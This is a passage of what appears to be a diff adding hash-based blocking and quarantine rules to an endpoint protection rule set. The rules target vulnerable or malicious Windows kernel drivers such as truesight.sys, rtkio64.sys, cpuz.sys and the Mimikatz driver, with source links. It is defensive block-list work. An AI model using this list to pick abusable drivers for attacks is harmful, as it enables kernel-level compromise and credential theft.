+ "hl_testing_start_time": "2026-03-23T11:45:30.826035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0956447f87a96b886c728a621eee105ade5ffd1bdb1583171f0c74a0c5b0e56",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "712074ef-379a-51b6-8e2c-1c74c9bc6ab7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619354Z",
+ "creation_date": "2026-03-23T11:45:29.619356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "916c535957a3b8cbf3336b63b2260ea4055163a9e6b214f2a7005d6d36a4a677",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7120fac4-2366-5d19-b9df-3f2aa234b839",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970383Z",
+ "creation_date": "2026-03-23T11:45:29.970385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71293ec7-8f9a-5cd3-81b1-529338fad8b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819970Z",
+ "creation_date": "2026-03-23T11:45:31.819974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d96fb94a4c4fc4bb0a79270c4ea070b3204c4ee9979be2d69439d879b3b85e19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71337250-7b58-51f3-9813-6ccdb1571a70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982573Z",
+ "creation_date": "2026-03-23T11:45:29.982575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51",
+ "comment": "Malicious Kernel Driver (aka daxin_blank5.sys) [https://www.loldrivers.io/drivers/0590655c-baa2-481a-b909-463534bd7a5e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "713fabed-fea3-5fe3-9330-c59582fc2528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141310Z",
+ "creation_date": "2026-03-23T11:45:31.141312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35b9c645469bdef383d63083d98bb947e3a1deab699d7984b86c1fe457ad260a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7142818b-a8e6-5562-8e06-e2092da083de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984458Z",
+ "creation_date": "2026-03-23T11:45:29.984460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d61ce5874adb89b4e992df8df879b568d9c4136df568718a768cd807d789a726",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71433f41-7133-5920-93d9-f85f7f8986b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155049Z",
+ "creation_date": "2026-03-23T11:45:31.155051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c0c8aea44644c2488ee1a9ddce05f183e47d3b6edee56697b0e127582cead55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7152878d-f71b-586f-97c5-5985a187cdfe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474682Z",
+ "creation_date": "2026-03-23T11:45:30.474686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474695Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9534f81749245346003690ecd5bdbd0a2b7011fa402c4984477ee7b4f80ca95",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71579d9d-aff0-5289-9136-5f691ea3300a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605022Z",
+ "creation_date": "2026-03-23T11:45:29.605024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605032Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62366c3a767c60984c67e58b8f57ca3ecce6eaa11006de8be318f074ecc350fd",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "715a3ee9-1d54-568f-b3a1-e697a3c7e889",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982677Z",
+ "creation_date": "2026-03-23T11:45:29.982679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27cd05527feb020084a4a76579c125458571da8843cdfc3733211760a11da970",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "715d09d9-b01f-564b-8051-e0905c869279",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826461Z",
+ "creation_date": "2026-03-23T11:45:30.826463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57876e89166558bb3f3aafb64347881e5d1e153b7d3bdfac492596839062fcec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71650996-ed68-52c2-b62d-3a534585d291",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487702Z",
+ "creation_date": "2026-03-23T11:45:31.487703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b1186d61e569091aa1c1e37ab78ead35bc3d568e9ada3f4a3f806a995ab94c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "717c8640-0b98-5998-b9f6-5c76aa1c5cda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829041Z",
+ "creation_date": "2026-03-23T11:45:31.829043Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccd3a7e948d34b5db6da27a98055e65e7c161f3c2e0a534fd114a0f080b84370",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "717cb000-9542-5749-876a-0c0a92b50f07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604264Z",
+ "creation_date": "2026-03-23T11:45:29.604266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb467e8c9edf1ac9ddabbc666cd48fc37b05e9d9390bb347504c899e15bce4d8",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "718256fb-b908-55df-a66e-52ba6e2e0552",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143808Z",
+ "creation_date": "2026-03-23T11:45:31.143810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f31fc480082ce2c9a5fde79fc84fda30869ed9a489d5a8984a4b8515f797cb11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7194fbfa-9525-53f0-9a8f-6ed02003d6f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985121Z",
+ "creation_date": "2026-03-23T11:45:29.985125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985134Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d50ee14181cf60bbdffe1a891b9bb3a852c93019f1f05dde47b3178b821b8f54",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "719cac79-9f5b-5767-b078-6705eb5cfa10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159553Z",
+ "creation_date": "2026-03-23T11:45:31.159555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "80d2a78390a8036400f0e67b51da1642bff09088e3578d3debe80b70859da088",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "719e319d-d4a2-5348-b9fc-7b051fbf2a7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146150Z",
+ "creation_date": "2026-03-23T11:45:31.146152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c2a21728cff35609180283bdcb4872290f3659187bdcf3ea4086fc11c68546d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71a110fe-9d7c-5f78-8ad8-47bcebb393f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979636Z",
+ "creation_date": "2026-03-23T11:45:29.979637Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979643Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28d3a5a85eef4561c4ad08fd83aca4f7a946f8dca8bfb7958a855a80197f68a6",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71aadc78-b29a-58fb-b4eb-22af8f917010",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610759Z",
+ "creation_date": "2026-03-23T11:45:29.610761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3e150eb7e7292f70299d3054ed429156a4c32b1f7466a706a2b99249022979e",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71ae193b-da8c-532b-94db-48a8e671a758",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977782Z",
+ "creation_date": "2026-03-23T11:45:29.977784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977789Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0892c3facb931521bbe87b31d836d376b169198c2550baaf444df742e85d0846",
+ "comment": "Vulnerable Kernel Driver (aka NetProxyDriver.sys) [https://www.loldrivers.io/drivers/c1ece07b-e92a-4050-95ee-90e03aa82120/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71b4ca0a-b181-53f2-9603-a9df87666c17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140190Z",
+ "creation_date": "2026-03-23T11:45:31.140192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140198Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29bf8f226cd4e048eef081546c4f0fd81ab77dbb54cc75e2c76effe93cb62919",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71b6e02f-949f-52ab-9536-62bc69d03743",
+ "test_maturity_current_count": 0,
